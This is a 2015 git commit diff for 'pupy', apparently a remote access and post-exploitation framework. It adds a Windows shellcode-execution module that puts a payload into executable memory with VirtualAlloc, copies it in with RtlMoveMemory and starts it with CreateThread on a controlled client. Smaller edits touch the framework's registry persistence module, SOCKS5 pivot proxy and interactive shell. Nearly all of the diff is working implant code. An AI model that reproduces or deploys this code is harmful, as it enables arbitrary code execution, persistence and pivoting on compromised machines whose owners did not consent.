Merge branch 'byt3bl33d3r-shellcode_exec'

2015-09-22 19:40:34 +02:00 · 2015-09-22 19:40:34 +02:00 · 16d02110bd
parent 5ffc734870 35140d4531
commit 16d02110bd
5 changed files with 60 additions and 3 deletions
--- a/pupy/modules/persistence.py
+++ b/pupy/modules/persistence.py
@ -8,7 +8,7 @@ import string
 __class_name__="PersistenceModule"

 class PersistenceModule(PupyModule):
-	""" Pop up a custom message box """
+	""" Enables persistence via registry keys """
 	def init_argparse(self):
 		self.arg_parser = PupyArgumentParser(prog="persistence", description=self.__doc__)
 		self.arg_parser.add_argument('-m','--method', choices=['registry'], required=True, help='persistence method')
--- a/pupy/modules/shellcode_exec.py
+++ b/pupy/modules/shellcode_exec.py
@ -0,0 +1,27 @@
+# -*- coding: UTF8 -*-
+
+'''
+Module by @byt3bl33d3r
+''' 
+
+from pupylib.PupyModule import *
+
+__class_name__="ShellcodeExec"
+
+class ShellcodeExec(PupyModule):
+	""" executes the supplied shellcode on a client """
+
+	def init_argparse(self):
+		self.arg_parser = PupyArgumentParser(prog='shellcode_exec', description=self.__doc__)
+		self.arg_parser.add_argument('path', help='Path to the shellcode to execute')
+
+	@windows_only
+	def is_compatible(self):
+		pass
+
+	def run(self, args):
+		self.client.load_package("pupwinutils.shellcode")
+		with open(args.path ,'r') as sfile:
+			shellcode = sfile.read()
+			self.client.conn.modules['pupwinutils.shellcode'].exec_shellcode(shellcode)
+		self.log('Shellcode executed!')
--- a/pupy/modules/socks5proxy.py
+++ b/pupy/modules/socks5proxy.py
@ -171,7 +171,7 @@ class ThreadedSocks5Server(SocketServer.ThreadingMixIn, Socks5Server):
 	pass

 class Socks5Proxy(PupyModule):
-	""" start a socks5 proxy gooing through a client """
+	""" start a socks5 proxy going through a client """
 	max_clients=1
 	unique_instance=True
 	daemon=True
--- a/pupy/packages/all/interactive_shell.py
+++ b/pupy/packages/all/interactive_shell.py
@ -48,7 +48,7 @@ def interactive_open(program=None, encoding=None):
 				program="/bin/sh"
 				encoding=None
 		print "Opening interactive %s ... (encoding : %s)"%(program,encoding)
-		p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, close_fds=ON_POSIX, universal_newlines=True)
+		p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, shell=True, close_fds=ON_POSIX, universal_newlines=True)
 		q = Queue()
 		q2 = Queue()
 		t = Thread(target=write_output, args=(p.stdout, q))
--- a/pupy/packages/windows/all/pupwinutils/shellcode.py
+++ b/pupy/packages/windows/all/pupwinutils/shellcode.py
@ -0,0 +1,30 @@
+import ctypes
+import threading
+
+def allocate_exe(shellcode):
+
+    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
+                                          ctypes.c_int(len(shellcode)),
+                                          ctypes.c_int(0x3000),
+                                          ctypes.c_int(0x40))
+ 
+    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
+ 
+    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
+                                        buf,
+                                        ctypes.c_int(len(shellcode)))
+ 
+    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
+                                         ctypes.c_int(0),
+                                         ctypes.c_int(ptr),
+                                         ctypes.c_int(0),
+                                         ctypes.c_int(0),
+                                         ctypes.pointer(ctypes.c_int(0)))
+ 
+    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
+
+def exec_shellcode(shellcode):
+    shellcode = bytearray(shellcode)
+    t = threading.Thread(target=allocate_exe, args=(shellcode,))
+    t.daemon = True
+    t.start()